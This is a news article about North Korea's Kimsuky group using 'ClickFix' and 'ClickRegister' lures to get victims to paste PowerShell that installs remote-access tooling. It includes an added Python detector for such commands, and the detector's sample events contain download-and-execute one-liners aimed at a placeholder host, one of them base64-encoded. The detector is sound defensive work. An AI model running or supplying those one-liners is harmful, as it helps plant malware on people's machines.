North Korean Hackers Deploy Deceptive 'ClickFix' Social Engineering Tactic

A sophisticated North Korean hacking group known as Kimsuky (also called Emerald Sleet) has been observed deploying a deceptive social engineering technique called "ClickFix" to target South Korean users.

The ClickFix tactic tricks users by displaying fake browser notifications claiming that a webpage, document, or video call feature needs fixing. Users are prompted to click a "Fix It" button and follow steps that involve copying and running malicious PowerShell scripts, which then download and execute malware without browser involvement.

Microsoft's threat analysts recently uncovered a variant of this attack, dubbed "ClickRegister." The hackers first establish communication with targets and build rapport before sending spear-phishing emails containing PDF attachments. When recipients try to view these documents, they are directed to a URL with device registration instructions.

The registration process requires users to run PowerShell with administrator privileges and paste code provided by the attackers. This code installs a browser-based remote desktop tool and downloads a certificate file with a preset PIN from a remote server. The compromised system then registers itself using these credentials, giving the hackers remote access to the device and the data on it.
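As an added example (not code from the article or from Microsoft's report), the Python below scores PowerShell script-block log text for the pasted download-and-run pattern described above, including the case where the payload is hidden behind an encoded command; the sample events and the example.invalid host are constructed placeholders.

```python
"""Flag PowerShell script-block text that looks like a pasted ClickFix one-liner:
remote content fetched and executed in the same command, often with evasion flags.
Added example; the sample events below are constructed, not real telemetry."""
import base64
import re

# Rule name -> case-insensitive regex applied to the script text (and to any
# decoded -EncodedCommand payload, since that is where the real command hides).
RULES = {
    "remote_fetch": r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|net\.webclient",
    "inline_exec": r"invoke-expression|\biex\b",
    "policy_bypass": r"-executionpolicy\s+bypass|-ep\s+bypass",
    "hidden_window": r"-windowstyle\s+hidden|-w\s+hidden",
}
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(script):
    """Return the UTF-16LE text behind any -EncodedCommand argument, or '' if none."""
    out = []
    for blob in ENCODED.findall(script):
        try:
            out.append(base64.b64decode(blob).decode("utf-16le", errors="ignore"))
        except ValueError:
            pass  # malformed base64: the raw text still goes through the rules
    return "\n".join(out)


def assess(script):
    """Return (verdict, hits). A fetch alone is normal admin work; a fetch paired
    with immediate execution or an evasion flag is the ClickFix shape."""
    decoded = decode_encoded_command(script)
    text = script + "\n" + decoded
    hits = [name for name, rx in RULES.items() if re.search(rx, text, re.I)]
    if decoded:
        hits.append("encoded_cmd")
    evasion = {"policy_bypass", "hidden_window", "encoded_cmd"} & set(hits)
    if "remote_fetch" in hits and ("inline_exec" in hits or evasion):
        return "suspicious", hits
    return "benign", hits


# Constructed samples modelled on Event ID 4104 script-block text (not real logs).
ENC_PAYLOAD = base64.b64encode(
    "iex (iwr https://example.invalid/fix.ps1 -UseBasicParsing)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    "powershell -w hidden -c \"iex (iwr 'https://example.invalid/fix.txt' -UseBasicParsing)\"",
    "Get-Service | Where-Object Status -eq 'Running'",
    "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\Temp\\report.csv",
    f"powershell -ExecutionPolicy Bypass -enc {ENC_PAYLOAD}",
]


def triage(events):
    """Assess each event; returns a list of (verdict, sorted hit names)."""
    return [(assess(s)[0], sorted(assess(s)[1])) for s in events]
```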

While this tactic has been observed in limited attacks since January 2025, it represents a notable shift in Kimsuky's strategy. The group traditionally targeted individuals involved in international affairs, particularly those focused on Northeast Asia, along with NGOs, government agencies, and media organizations across multiple continents.

Security experts recommend organizations implement strict system controls and attack surface reduction rules to protect against these threats, as traditional security awareness training may not be sufficient to counter such sophisticated social engineering tactics.